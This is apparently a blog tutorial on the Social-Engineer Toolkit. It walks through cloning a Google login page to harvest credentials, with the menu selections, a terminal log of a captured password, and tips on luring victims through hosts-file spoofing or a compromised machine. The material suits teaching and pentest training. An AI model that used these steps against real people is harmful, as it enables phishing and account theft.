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Social Engineer Toolkit

August 1, 2023 · 8 minute read


DISCLAIMER: The information provided in this article is intended for EDUCATIONAL purposes only. It is NOT intended to promote, encourage, or condone any illegal or unethical activities. Any actions taken based on information provided in this article are at the sole discretion and risk of the user. By reading this article, you acknowledge and agree to these terms.
The Social-Engineer Toolkit (SET) is an open-source framework designed for performing social engineering attacks. It was developed by David Kennedy (ReL1K) at TrustedSec.
Social engineering is a technique that involves manipulating individuals into divulging confidentional information, or performing actions that compromise security. One of the most popular social engineering attacks that you may have encountered today is phishing. These attacks exploit human psychology and behavior rather than relying on technical vulnerabilities.
SET provides various tools and modules that enable us to simulate social engineering attacks. Some of the functionalities include spear phishing, website cloning, credential harvesting, and metasploit integration. Below are of the most popular Social-Engineering attacks available:
──(root㉿kali)-[/home/kali] └─# setoolkit ..:::::::::.. ..:::aad8888888baa:::.. .::::d:?88888888888?::8b::::. .:::d8888:?88888888??a888888b:::. .:::d8888888a8888888aa8888888888b:::. ::::dP::::::::88888888888::::::::Yb:::: ::::dP:::::::::Y888888888P:::::::::Yb:::: ::::d8:::::::::::Y8888888P:::::::::::8b:::: .::::88::::::::::::Y88888P::::::::::::88::::. :::::Y8baaaaaaaaaa88P:T:Y88aaaaaaaaaad8P::::: :::::::Y88888888888P::|::Y88888888888P::::::: ::::::::::::::::888:::|:::888:::::::::::::::: `:::::::::::::::8888888888888b::::::::::::::' :::::::::::::::88888888888888:::::::::::::: :::::::::::::d88888888888888::::::::::::: ::::::::::::88::88::88:::88:::::::::::: `::::::::::88::88::88:::88::::::::::' `::::::::88::88::P::::88::::::::' `::::::88::88:::::::88::::::' ``:::::::::::::::::::'' ``:::::::::'' [---] The Social-Engineer Toolkit (SET) [---] [---] Created by: David Kennedy (ReL1K) [---] Version: 8.0.3 Codename: 'Maverick' [---] Follow us on Twitter: @TrustedSec [---] [---] Follow me on Twitter: @HackingDave [---] [---] Homepage: [---] Welcome to the Social-Engineer Toolkit (SET). The one stop shop for all of your SE needs. The Social-Engineer Toolkit is a product of TrustedSec. Visit: It's easy to update using the PenTesters Framework! (PTF) Visit to update all your tools! Select from the menu: 1) Social-Engineering Attacks 2) Penetration Testing (Fast-Track) 3) Third Party Modules 4) Update the Social-Engineer Toolkit 5) Update SET configuration 6) Help, Credits, and About 99) Exit the Social-Engineer Toolkit set>

Credential Harvesting

Credential Harvesting is a technique used to obtain sensitive information such as usernames, passwords, credit card details, and other information from individuals. This is typically done by impersonating a legitimate website such as a bank, social media platform, or other reputable website.
Attackers will typically host a web page on a server that mimics a legitimate website. When victims navigate to this web server, the are tricked into believing that they need to provide sensitive information in order to proceed. However, after specifying said information, the website will typically report the information back to the attacker. Typically, in order to be less suspicious, the website will redirect the user to the real website after credentials have been captured.
The Social Engineering Toolkit has functionality that makes it EXTREMELY easy to perform this attack. Below is a brief demonstration of me utilizing SET to impersonate a google login page. First we begin by navigating to the proper tool within SET. Below se select 2) Website Attack Vectors.
Select from the menu: 1) Spear-Phishing Attack Vectors 2) [Website Attack Vectors] 3) Infectious Media Generator 4) Create a Payload and Listener 5) Mass Mailer Attack 6) Arduino-Based Attack Vector 7) Wireless Access Point Attack Vector 8) QRCode Generator Attack Vector 9) Powershell Attack Vectors 10) Third Party Modules 99) Return back to the main menu. set> 2
Once in this menu, we select the Credential Harvester Attack Method.
1) Java Applet Attack Method 2) Metasploit Browser Exploit Method 3) [Credential Harvester Attack Method] 4) Tabnabbing Attack Method 5) Web Jacking Attack Method 6) Multi-Attack Web Method 7) HTA Attack Method 99) Return to Main Menu set:webattack>3
The next section allows us determine what website we want to emulate. This typically should be a login page, or a page to enter in sensitive information such as a checkout cart that is prompting the user for a credit card. There are a couple options here, web templates allow you to select pre-selected templates of legitimate websites. Google and Twitter are one of the most popular options for credential harvesting. The Site Cloner function enables you to pass through the link of a website, and the script will attempt to clone all of the HTML and CSS elements of the website andd emulate it.
In this case, I use the pre-selected template of Google.
------------------------------------------------------------------------------- --- * IMPORTANT * READ THIS BEFORE ENTERING IN THE IP ADDRESS * IMPORTANT * --- The way that this works is by cloning a site and looking for form fields to rewrite. If the POST fields are not usual methods for posting forms this could fail. If it does, you can always save the HTML, rewrite the forms to be standard forms and use the "IMPORT" feature. Additionally, really important: If you are using an EXTERNAL IP ADDRESS, you need to place the EXTERNAL IP address below, not your NAT address. Additionally, if you don't know basic networking concepts, and you have a private IP address, you will need to do port forwarding to your NAT IP address from your external IP address. A browser doesns't know how to communicate with a private IP address, so if you don't specify an external IP address if you are using this from an external perpective, it will not work. This isn't a SET issue this is how networking works. set:webattack> IP address for the POST back in Harvester/Tabnabbing []:
The next step is to enter the IP adddress in which we'll receive the information. In this case, I just use my local laptop using Kali as the malicious web server.
Now the malicious website is hosted! The next step is to get the victim to navigate to our website. This can be done by a variety of techniques discussed later.
[*] Cloning the website: [*] This could take a little bit... The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website. [*] The Social-Engineer Toolkit Credential Harvester Attack [*] Credential Harvester is running on port 80 [*] Information will be displayed to you as it arrives below: - - [28/Aug/2023 20:31:28] "GET / HTTP/1.1" 200 - [*] WE GOT A HIT! Printing the output: PARAM: GALX=SJLCkfgaqoM PARAM: checkedDomains=youtube POSSIBLE USERNAME FIELD FOUND: POSSIBLE PASSWORD FIELD FOUND: Passwd=mongeyape PARAM: signIn=Sign+in PARAM: PersistentCookie=yes [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT. - - [28/Aug/2023 20:31:47] "POST /ServiceLoginAuth HTTP/1.1" 302 - - - [28/Aug/2023 20:32:20] "GET / HTTP/1.1" 200 -
From the information above, we can see that the IP Adddress of connected to our website and entered in their credentials. Note that to the victim, the website looks identical to Google's login page. Below is a screenshot of what the page looks like.
picture of google's login page
One of the main issues with this method is that NO end user is going to navigate to an IP Address or click on an IP Address link. One of the ways to address this is to perform DNS Spoofing by modifying the hosts file on the machine to redirect users to the malicious web server. Obviously, this has issues on it's own since you must be administrator to be able to modify the hosts file. However, there are other practical applications of this, perhaps you hand the target a compromised machine and ask them to login to their account.